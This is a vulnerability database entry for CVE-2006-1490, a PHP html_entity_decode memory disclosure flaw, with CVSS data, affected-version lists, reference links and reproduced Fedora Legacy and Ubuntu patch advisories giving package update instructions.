CVE-2006-1490
CVSS 5.0
Published: 2006-03-29 16:06:00
Last revised: 2011-03-07 21:33:11

[Original] PHP before 5.1.3-RC1 might allow remote attackers to obtain portions of memory via crafted binary data sent to a script that processes user input in the html_entity_decode function and sends the encoded results back to the client, aka a "binary safety" issue. NOTE: this issue has been referred to as a "memory leak," but it is an information leak that discloses memory contents.


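[CNNVD] PHP html_entity_decode() function information disclosure vulnerability (CNNVD-200603-486)

        PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML.
        The html_entity_decode function in PHP contains an input validation error. If a script that uses this function receives input from an untrusted remote source, it returns the function's result, resulting in memory disclosure.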

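- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)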

cpe:/a:php:php:3.0.17  PHP PHP 3.0.17
cpe:/a:php:php:5.0.0:rc1  PHP PHP 5.0.0 RC1
cpe:/a:php:php:3.0.13  PHP PHP 3.0.13
cpe:/a:php:php:5.0.0:beta3  PHP PHP 5.0.0 Beta3
cpe:/a:php:php:4.0.1  PHP PHP 4.0.1
cpe:/a:php:php:5.0.0:beta2  PHP PHP 5.0.0 Beta2
cpe:/a:php:php:5.0.5  PHP PHP 5.0.5
cpe:/a:php:php:5.0.0:rc3  PHP PHP 5.0.0 RC3
cpe:/a:php:php:4.3.1  PHP PHP 4.3.1
cpe:/a:php:php:4.3.10  PHP PHP 4.3.10
cpe:/a:php:php:4.0.0  PHP PHP 4.0.0
cpe:/a:php:php:4.3.7  PHP PHP 4.3.7
cpe:/a:php:php:3.0.1  PHP PHP 3.0.1
cpe:/a:php:php:4.2.0  PHP PHP 4.2.0
cpe:/a:php:php:5.0.1  PHP PHP 5.0.1
cpe:/a:php:php:3.0.14  PHP PHP 3.0.14
cpe:/a:php:php:4.2.2  PHP PHP 4.2.2
cpe:/a:php:php:5.0:rc1
cpe:/a:php:php:4.0.7:rc3
cpe:/a:php:php:4.0.2  PHP PHP 4.0.2
cpe:/a:php:php:4.0.6  PHP PHP 4.0.6
cpe:/a:php:php:5.0:rc3
cpe:/a:php:php:4.1.2  PHP PHP 4.1.2
cpe:/a:php:php:4.0.5  PHP PHP 4.0.5
cpe:/a:php:php:5.1.1  PHP PHP 5.1.1
cpe:/a:php:php:4.2::dev
cpe:/a:php:php:4.3.6  PHP PHP 4.3.6
cpe:/a:php:php:4.0.1:patch2
cpe:/a:php:php:4.3
cpe:/a:php:php:4.0.4  PHP PHP 4.0.4
cpe:/a:php:php:4.4.2  PHP PHP 4.4.2
cpe:/a:php:php:3.0.15  PHP PHP 3.0.15
cpe:/a:php:php:5.0.4  PHP PHP 5.0.4
cpe:/a:php:php:5.0.0:rc2  PHP PHP 5.0.0 RC2
cpe:/a:php:php:4.3.4  PHP PHP 4.3.4
cpe:/a:php:php:3.0.9  PHP PHP 3.0.9
cpe:/a:php:php:4.0.3  PHP PHP 4.0.3
cpe:/a:php:php:5.0:rc2
cpe:/a:php:php:4.3.2  PHP PHP 4.3.2
cpe:/a:php:php:4.3.3  PHP PHP 4.3.3
cpe:/a:php:php:3.0.16  PHP PHP 3.0.16
cpe:/a:php:php:4.0.1:patch1
cpe:/a:php:php:3.0.2  PHP PHP 3.0.2
cpe:/a:php:php:4.0.3:patch1
cpe:/a:php:php:5.1.2  PHP PHP 5.1.2
cpe:/a:php:php:3.0.5  PHP PHP 3.0.5
cpe:/a:php:php:5.1.0  PHP PHP 5.1.0
cpe:/a:php:php:3.0.7  PHP PHP 3.0.7
cpe:/a:php:php:4.0.7:rc2
cpe:/a:php:php:5.0.0  PHP PHP 5.0.0
cpe:/a:php:php:5.0.2  PHP PHP 5.0.2
cpe:/a:php:php:4.2.1  PHP PHP 4.2.1
cpe:/a:php:php:4.4.1  PHP PHP 4.4.1
cpe:/a:php:php:5.0.3  PHP PHP 5.0.3
cpe:/a:php:php:3.0.11  PHP PHP 3.0.11
cpe:/a:php:php:4.1.1  PHP PHP 4.1.1
cpe:/a:php:php:3.0.6  PHP PHP 3.0.6
cpe:/a:php:php:4.0.7  PHP PHP 4.0.7
cpe:/a:php:php:3.0.10  PHP PHP 3.0.10
cpe:/a:php:php:3.0.12  PHP PHP 3.0.12
cpe:/a:php:php:4.3.11  PHP PHP 4.3.11
cpe:/a:php:php:5.0.0:beta1  PHP PHP 5.0.0 Beta1
cpe:/a:php:php:4.0.7:rc1
cpe:/a:php:php:3.0.8  PHP PHP 3.0.8
cpe:/a:php:php:3.0.18  PHP PHP 3.0.18
cpe:/a:php:php:5.0.0:beta4  PHP PHP 5.0.0 Beta4
cpe:/a:php:php:4.3.8  PHP PHP 4.3.8
cpe:/a:php:php:3.0.3  PHP PHP 3.0.3
cpe:/a:php:php:4.1.0  PHP PHP 4.1.0
cpe:/a:php:php:3.0  PHP PHP 3.0
cpe:/a:php:php:4.4.0  PHP PHP 4.4.0
cpe:/a:php:php:4.3.9  PHP PHP 4.3.9
cpe:/a:php:php:3.0.4  PHP PHP 3.0.4
cpe:/a:php:php:4.3.5  PHP PHP 4.3.5
cpe:/a:php:php:4.2.3  PHP PHP 4.2.3

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11084  PHP before 5.1.3-RC1 might allow remote attackers to obtain portions of memory via crafted binary data sent to a script that processes user ...
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1490
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1490
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-486
(Official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-333A.html
(UNKNOWN)  CERT  TA06-333A
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?r1=1.112&r2=1.113
(PATCH)  MISC  http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?r1=1.112&r2=1.113
http://www.vupen.com/english/advisories/2006/4750
(UNKNOWN)  VUPEN  ADV-2006-4750
http://www.vupen.com/english/advisories/2006/2685
(UNKNOWN)  VUPEN  ADV-2006-2685
http://www.vupen.com/english/advisories/2006/1149
(UNKNOWN)  VUPEN  ADV-2006-1149
http://www.securityfocus.com/archive/1/archive/1/429164/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 Critical PHP bug - act ASAP if you are running web with sensitive data
http://www.securityfocus.com/archive/1/archive/1/429162/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 Re: [Full-disclosure] Critical PHP bug - act ASAP if you are running web with sensitive data
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?view=log
(UNKNOWN)  MISC  http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/html.c?view=log
http://bugs.gentoo.org/show_bug.cgi?id=127939
(UNKNOWN)  CONFIRM  http://bugs.gentoo.org/show_bug.cgi?id=127939
http://xforce.iss.net/xforce/xfdb/25508
(UNKNOWN)  XF  php-htmlentitydecode-information-disclosure(25508)
http://www.ubuntu.com/usn/usn-320-1
(UNKNOWN)  UBUNTU  USN-320-1
http://www.trustix.org/errata/2006/0020
(UNKNOWN)  TRUSTIX  2006-0020
http://www.securityfocus.com/bid/17296
(UNKNOWN)  BID  17296
http://www.novell.com/linux/security/advisories/05-05-2006.html
(UNKNOWN)  SUSE  SUSE-SA:2006:024
http://www.mandriva.com/security/advisories?name=MDKSA-2006:063
(UNKNOWN)  MANDRIVA  MDKSA-2006:063
http://support.avaya.com/elmodocs2/security/ASA-2006-129.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-129.htm
http://security.gentoo.org/glsa/glsa-200605-08.xml
(UNKNOWN)  GENTOO  GLSA-200605-08
http://secunia.com/advisories/23155
(UNKNOWN)  SECUNIA  23155
http://secunia.com/advisories/21125
(UNKNOWN)  SECUNIA  21125
http://secunia.com/advisories/20951
(UNKNOWN)  SECUNIA  20951
http://secunia.com/advisories/20210
(UNKNOWN)  SECUNIA  20210
http://secunia.com/advisories/20052
(UNKNOWN)  SECUNIA  20052
http://secunia.com/advisories/19979
(UNKNOWN)  SECUNIA  19979
http://secunia.com/advisories/19832
(UNKNOWN)  SECUNIA  19832
http://secunia.com/advisories/19570
(UNKNOWN)  SECUNIA  19570
http://secunia.com/advisories/19499
(UNKNOWN)  SECUNIA  19499
http://secunia.com/advisories/19383
(UNKNOWN)  SECUNIA  19383
http://rhn.redhat.com/errata/RHSA-2006-0276.html
(UNKNOWN)  REDHAT  RHSA-2006:0276
http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2006-11-28
http://docs.info.apple.com/article.html?artnum=304829
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=304829
ftp://patches.sgi.com/support/free/security/advisories/20060501-01-U.asc
(UNKNOWN)  SGI  20060501-01-U

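- Vulnerability information

PHP html_entity_decode() function information disclosure vulnerability
Medium risk  Input validation
2006-03-29 00:00:00 2006-03-30 00:00:00
Remote
        PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML.
        The html_entity_decode function in PHP contains an input validation error. If a script that uses this function receives input from an untrusted remote source, it returns the function's result, resulting in memory disclosure.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page: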
        http://www.php.net
        

- Vulnerability information (F48756)

FLSA-2006-175040.txt (PacketStormID:F48756)
2006-08-03 00:00:00
 
advisory,php
linux,fedora
CVE-2005-2933,CVE-2005-3883,CVE-2006-0208,CVE-2006-0996,CVE-2006-1490,CVE-2006-1990

Fedora Legacy Update Advisory FLSA:175040 - Updated PHP packages that fix multiple security issues are now available.

---------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis:          Updated php packages fix security issues
Advisory ID:       FLSA:175040
Issue date:        2006-07-27
Product:           Red Hat Linux, Fedora Core
Keywords:          Bugfix
CVE Names:         CVE-2005-2933 CVE-2005-3883 CVE-2006-0208
                   CVE-2006-0996 CVE-2006-1490 CVE-2006-1990
---------------------------------------------------------------------


---------------------------------------------------------------------
1. Topic:

Updated PHP packages that fix multiple security issues are now
available.

PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Web server.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386
Fedora Core 3 - i386, x86_64

3. Problem description:

A buffer overflow flaw was discovered in uw-imap, the University of
Washington's IMAP Server. php-imap is compiled against the static
c-client libraries from imap and therefore needed to be recompiled
against the fixed version. (CVE-2005-2933).

An input validation error was found in the "mb_send_mail()" function. An
attacker could use this flaw to inject arbitrary headers in a mail sent
via a script calling the "mb_send_mail()" function where the "To"
parameter can be controlled by the attacker. (CVE-2005-3883)

The error handling output was found to not properly escape HTML output
in certain cases. An attacker could use this flaw to perform cross-site
scripting attacks against sites where both display_errors and
html_errors are enabled. (CVE-2006-0208)

The phpinfo() PHP function did not properly sanitize long strings. An
attacker could use this to perform cross-site scripting attacks against
sites that have publicly-available PHP scripts that call phpinfo().
(CVE-2006-0996)

The html_entity_decode() PHP function was found to not be binary safe.
An attacker could use this flaw to disclose a certain part of the
memory. In order for this issue to be exploitable the target site would
need to have a PHP script which called the "html_entity_decode()"
function with untrusted input from the user and displayed the result.
(CVE-2006-1490)

The wordwrap() PHP function did not properly check for integer overflow
in the handling of the "break" parameter. An attacker who could control
the string passed to the "break" parameter could cause a heap overflow.
(CVE-2006-1990)

Users of PHP should upgrade to these updated packages, which contain
backported patches that resolve these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175040

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.20.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-manual-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-mysql-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-odbc-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-pgsql-4.1.2-7.3.20.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-snmp-4.1.2-7.3.20.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/php-4.2.2-17.21.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/php-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-devel-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-imap-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-ldap-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-manual-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-mysql-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-odbc-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-pgsql-4.2.2-17.21.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/php-snmp-4.2.2-17.21.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/php-4.3.11-1.fc1.6.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/php-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-devel-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-imap-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.6.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.6.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/php-4.3.11-1.fc2.7.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/php-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-devel-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-imap-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-pear-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/php-xmlrpc-4.3.11-1.fc2.7.legacy.i386.rpm

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/php-4.3.11-2.8.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/php-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-devel-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-domxml-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-gd-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-imap-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-ldap-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-mbstring-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-mysql-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-ncurses-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-odbc-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-pear-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-pgsql-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-snmp-4.3.11-2.8.4.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/php-xmlrpc-4.3.11-2.8.4.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-devel-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-domxml-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-gd-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-imap-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-ldap-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-mbstring-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-mysql-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-ncurses-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-odbc-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-pear-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-pgsql-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-snmp-4.3.11-2.8.4.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/php-xmlrpc-4.3.11-2.8.4.legacy.x86_64.rpm


7. Verification:


These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3883
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0208
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0996
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1490
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1990

9. Contact:

The Fedora Legacy security contact is <secnotice@fedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

    

- Vulnerability information (F48439)

Ubuntu Security Notice 320-1 (PacketStormID:F48439)
2006-07-24 00:00:00
Ubuntu  security.ubuntu.com
advisory,vulnerability
linux,ubuntu
CVE-2006-0996,CVE-2006-1490,CVE-2006-1494,CVE-2006-1608,CVE-2006-1990,CVE-2006-1991,CVE-2006-2563,CVE-2006-2660,CVE-2006-3011,CVE-2006-3016,CVE-2006-3018

Ubuntu Security Notice 320-1 - Multiple vulnerabilities in php4 and php5 have been fixed in Ubuntu.

=========================================================== 
Ubuntu Security Notice USN-320-1              July 19, 2006
php4, php5 vulnerabilities
CVE-2006-0996, CVE-2006-1490, CVE-2006-1494, CVE-2006-1608,
CVE-2006-1990, CVE-2006-1991, CVE-2006-2563, CVE-2006-2660,
CVE-2006-3011, CVE-2006-3016, CVE-2006-3018
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libapache2-mod-php4                      4:4.3.10-10ubuntu4.5
  php4-cgi                                 4:4.3.10-10ubuntu4.5
  php4-cli                                 4:4.3.10-10ubuntu4.5

Ubuntu 5.10:
  libapache2-mod-php5                      5.0.5-2ubuntu1.3
  php5-cgi                                 5.0.5-2ubuntu1.3
  php5-cli                                 5.0.5-2ubuntu1.3
  php5-curl                                5.0.5-2ubuntu1.3

Ubuntu 6.06 LTS:
  libapache2-mod-php5                      5.1.2-1ubuntu3.1
  php5-cgi                                 5.1.2-1ubuntu3.1
  php5-cli                                 5.1.2-1ubuntu3.1
  php5-curl                                5.1.2-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The phpinfo() PHP function did not properly sanitize long strings. A
remote attacker could use this to perform cross-site scripting attacks
against sites that have publicly-available PHP scripts that call
phpinfo(). Please note that it is not recommended to publicly expose
phpinfo(). (CVE-2006-0996)

An information disclosure has been reported in the
html_entity_decode() function. A script which uses this function to
process arbitrary user-supplied input could be exploited to expose a
random part of memory, which could potentially reveal sensitive data.
(CVE-2006-1490)

The wordwrap() function did not sufficiently check the validity of the
'break' argument. An attacker who could control the string passed to
the 'break' parameter could cause a heap overflow; however, this
should not happen in practical applications. (CVE-2006-1990)

The substr_compare() function did not sufficiently check the validity
of the 'offset' argument. A script which passes untrusted user-defined
values to this parameter could be exploited to crash the PHP
interpreter. (CVE-2006-1991)

In certain situations, using unset() to delete a hash entry could
cause the deletion of the wrong element, which would leave the
specified variable defined. This could potentially cause information
disclosure in security-relevant operations. (CVE-2006-3017)

In certain situations the session module attempted to close a data
file twice, which led to memory corruption. This could potentially be
exploited to crash the PHP interpreter, though that could not be
verified. (CVE-2006-3018)

This update also fixes various bugs which allowed local scripts
to bypass open_basedir and 'safe mode' restrictions by passing special
arguments to tempnam() (CVE-2006-1494, CVE-2006-2660), copy()
(CVE-2006-1608), the curl module (CVE-2006-2563), or error_log()
(CVE-2006-3011).


Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.diff.gz
      Size/MD5:   281888 6b2f9b14e6b17fd16b39fc992370c700
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.dsc
      Size/MD5:     1469 e107321f5a864fec29aba0ddc4557bda
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10.orig.tar.gz
      Size/MD5:  4892209 73f5d1f42e34efa534a09c6091b5a21e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5_all.deb
      Size/MD5:     1128 e68858ad284ff509a9a7ba6004cd85b3

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3.diff.gz
      Size/MD5:   107447 9032c71ebc4f7cbabe69cf553ca53bb6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3.dsc
      Size/MD5:     1707 3101f858bd7f41d4d9596899e6fd545c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5.orig.tar.gz
      Size/MD5:  6082082 ae36a2aa35cfaa58bdc5b9a525e6f451

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.0.5-2ubuntu1.3_all.deb
      Size/MD5:   173678 bf244c954f00526ebfb99d054610cb22
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3_all.deb
      Size/MD5:     1040 17d3d2c9eb5aaeea047f7b95df5d7c4b

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1.diff.gz
      Size/MD5:   102328 0355a96821276d519f8c8782a4b6e81a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1.dsc
      Size/MD5:     1768 36e92785f0566e85a217ca71e9a5c2b2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz
      Size/MD5:  8064193 b5b6564e8c6a0d5bc1d2b4787480d792

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.1_all.deb
      Size/MD5:   301884 c046bd6ffadcc67a3e92d11c97056433
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1_all.deb
      Size/MD5:     1040 adf10698f586c659825d6bb419c57e02

- Vulnerability information

24248
PHP html_entity_decode() Function Memory Content Disclosure
Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-03-28 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PHP Html_Entity_Decode() Information Disclosure Vulnerability
Input Validation Error 17296
Yes No
2006-03-29 12:00:00 2007-01-25 04:19:00
Reported by Tõnu Samuel.

- Affected versions

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.04 powerpc
Ubuntu Ubuntu Linux 5.04 i386
Ubuntu Ubuntu Linux 5.04 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
